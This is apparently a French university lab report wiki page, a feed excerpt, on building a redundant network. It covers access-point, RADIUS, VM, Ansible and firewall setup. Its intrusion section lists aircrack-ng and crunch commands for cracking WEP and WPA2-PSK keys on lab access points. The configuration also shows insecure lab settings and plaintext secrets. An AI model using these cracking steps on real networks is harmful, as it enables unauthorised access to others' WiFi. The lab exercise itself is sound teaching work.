&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
'''5.5  Intrusion sur un serveur d’application Web'''&lt;br /&gt;
[[Fichier:Wiki intrusion 5.5.zip]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom du point d'accès connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Sources : &lt;br /&gt;
- https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
- https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau006.html#sec29&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en root (mdp : Cisco si par défaut)&lt;br /&gt;
 conf t &lt;br /&gt;
 hostname wifi-ima5sc-e304 =&amp;gt; (optionnel) on donne un nom à notre point d'accès&lt;br /&gt;
 ip domain-name plil.info =&amp;gt; ajoute un nom de domaine (utilisé pour la création de certificats)&lt;br /&gt;
 &lt;br /&gt;
Activation du ssh :&lt;br /&gt;
 &lt;br /&gt;
 crypto key generate rsa general-keys modulus 2048 =&amp;gt; Génération clés publique/privée &lt;br /&gt;
 ip ssh version 2 =&amp;gt; Activation ssh&lt;br /&gt;
&lt;br /&gt;
Configuration de l'authentification sur le point d'accès :&lt;br /&gt;
&lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_marguerite group radius_marguerite&lt;br /&gt;
 radius-server host 193.48.57.177 auth-port 1812 acct-port 1813 key secret_marguerite&lt;br /&gt;
 aaa group server radius radius_marguerite&lt;br /&gt;
 server 193.48.57.177 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 dot11 ssid SSID_MARGUERITE&lt;br /&gt;
 vlan 11&lt;br /&gt;
  authentication open eap eap_marguerite&lt;br /&gt;
  authentication network-eap eap_marguerite&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Association du SSID à l'interface Wi-Fi :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
  encryption vlan 11 mode ciphers aes-ccm tkip&lt;br /&gt;
  ssid SSID_MARGUERITE&lt;br /&gt;
  mbssid&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration du Vlan 11 :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  no ip route-cache&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  bridge-group 11 subscriber-loop-control&lt;br /&gt;
  bridge-group 11 spanning-disabled&lt;br /&gt;
  bridge-group 11 block-unknown-source&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration interface filaire :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'IP du point d'accès et sa Gateway (n'est pas à faire par tous les groupes) :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
  ip default-gateway 10.1.0.2&lt;br /&gt;
  interface BVI 1&lt;br /&gt;
   ip address 10.1.0.4 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
'''Configuration du routeur en e304 :''' &lt;br /&gt;
&lt;br /&gt;
Configuration du VLAN1 :&lt;br /&gt;
  conf t&lt;br /&gt;
  interface vlan 1&lt;br /&gt;
   ip address 10.1.0.2 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Configuration du port sur lequel est branché l'AP en mode trunk : &lt;br /&gt;
&lt;br /&gt;
  conf t&lt;br /&gt;
  interface Gi4/2&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
   switchport trunk allowed vlan add 1&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
= Serveur FreeRadius =&lt;br /&gt;
&lt;br /&gt;
Installation de freeRADIUS&lt;br /&gt;
&lt;br /&gt;
 apt install freeradius&lt;br /&gt;
&lt;br /&gt;
On commence par configurer &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; à détailler&lt;br /&gt;
&lt;br /&gt;
 client marguerite {&lt;br /&gt;
 	ipaddr = 10.1.0.4/24&lt;br /&gt;
 	secret = secret_marguerite&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
ensuite &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 eap {&lt;br /&gt;
   [...]&lt;br /&gt;
   default_eap_type = peap&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
puis &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 root Cleartext-Password := &amp;quot;glopglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug &amp;lt;code&amp;gt;freeradius -X&amp;lt;/code&amp;gt; (après avoir au préalable stoppé le processus)&lt;br /&gt;
&lt;br /&gt;
= Ferme de serveurs Web =&lt;br /&gt;
&lt;br /&gt;
Installation VM xen :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/pra-07.cfg&lt;br /&gt;
&lt;br /&gt;
Configuration IP :&lt;br /&gt;
&lt;br /&gt;
Dans /etc/network/interfaces :&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.102&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Vérifier si on a bien la passerelle par défaut de configurer &lt;br /&gt;
&lt;br /&gt;
 ip r&lt;br /&gt;
&lt;br /&gt;
On peut pinger le routeur :&lt;br /&gt;
&lt;br /&gt;
 ping 172.26.154.254&lt;br /&gt;
&lt;br /&gt;
Mais pas les addresses ipv4 routée :&lt;br /&gt;
&lt;br /&gt;
 ping 8.8.8.8 échoue &lt;br /&gt;
&lt;br /&gt;
Redémarage service networking&lt;br /&gt;
&lt;br /&gt;
 service networking restart&lt;br /&gt;
&lt;br /&gt;
Si ça n'est pas suffisant :&lt;br /&gt;
&lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
 &lt;br /&gt;
Dans /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Redémarage service ssh&lt;br /&gt;
export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'une clé ssh sur la zabeth et ajout de cette clé dans les clés autorisées de la vm de pra :&lt;br /&gt;
&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;aviran.tetia@polytech-lille.net&amp;quot; -P &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
On copie le contenu de la clé crée :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_ed25519.pub&lt;br /&gt;
&lt;br /&gt;
On colle son contenu dans les clé authorisées de la VM (fichier ~/.ssh/authorized_keys) :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/authorized_keys &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Correction de la source list de la VM pour pouvoir utiliser apt correctement :&lt;br /&gt;
&lt;br /&gt;
On remplace les deux dernières lignes par :&lt;br /&gt;
&lt;br /&gt;
 deb     http://security.debian.org/debian-security bullseye-security main contrib non-free&lt;br /&gt;
 deb-src http://security.debian.org/debian-security bullseye-security  main contrib non-free&lt;br /&gt;
 &lt;br /&gt;
Installation de python sur la VM :&lt;br /&gt;
&lt;br /&gt;
 apt update &lt;br /&gt;
 apt install python3&lt;br /&gt;
&lt;br /&gt;
Création d'un venv pour l'éxecution :&lt;br /&gt;
&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On crée l'arborescence suivante :&lt;br /&gt;
 &lt;br /&gt;
 └── roles&lt;br /&gt;
    ├── base&lt;br /&gt;
    │   ├── tasks&lt;br /&gt;
    │   │   └── main.yml&lt;br /&gt;
    │   └── templates&lt;br /&gt;
    │       ├── hostname.j2&lt;br /&gt;
    │       └── hosts.j2&lt;br /&gt;
    └── ssh_key&lt;br /&gt;
        ├── tasks&lt;br /&gt;
        │   └── main.yml&lt;br /&gt;
        └── templates&lt;br /&gt;
            └── keys.j2&lt;br /&gt;
&lt;br /&gt;
Dans main.yml :&lt;br /&gt;
 - name: &amp;quot;Setup sshkeys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: &amp;quot;0600&amp;quot;&lt;br /&gt;
&lt;br /&gt;
/!\ ne pas mettre de tabulation dans ce fichier, uniquement des espaces&lt;br /&gt;
&lt;br /&gt;
Dans keys.j2 :&lt;br /&gt;
  {% for item in ssh_keys %}&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;{{ item.key }}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
Ajout d'une clef dans les variables de groupe group_vars/all.yaml :&lt;br /&gt;
 &lt;br /&gt;
 ssh_keys:&lt;br /&gt;
  # if you don't install this i won't be able to get into your nodes to help you debug :)&lt;br /&gt;
  - name: tmaurice@thonkpad&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad&lt;br /&gt;
    # add more keys here&lt;br /&gt;
  - name: aviran.tetia@polytech-lille.net&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis lancer la commande :&lt;br /&gt;
&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
Vérification dans le fichier /root/.ssh/authorized_keys  :&lt;br /&gt;
 &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Nous obtenons bien toutes nos clefs ssh.&lt;br /&gt;
&lt;br /&gt;
Ajout des var d'environement pour pouvoir installer docker :&lt;br /&gt;
&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Installation du rôle Docker :&lt;br /&gt;
 &lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Puis dans polytech.yml :&lt;br /&gt;
&lt;br /&gt;
 - hosts: all&lt;br /&gt;
   roles:&lt;br /&gt;
    ...&lt;br /&gt;
    - geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après ré-execution du playbook, nous pouvons vérifier que Docker est bien installé : &lt;br /&gt;
&lt;br /&gt;
 docker -v &lt;br /&gt;
&lt;br /&gt;
Installation du Pare-feu :&lt;br /&gt;
&lt;br /&gt;
source : https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
&lt;br /&gt;
- création de roles/iptables/tasks/main.yml :&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT tcp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: tcp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_tcp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT udp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: udp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_udp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Set the policy for the INPUT chain to DROP&lt;br /&gt;
  ansible.builtin.iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    policy: DROP&lt;br /&gt;
&lt;br /&gt;
- Cration du fichier de variables :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_tcp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8500&lt;br /&gt;
  - 8501&lt;br /&gt;
  - 8502&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 8300 &lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_udp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57731</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57731"/>
				<updated>2022-01-10T16:28:30Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
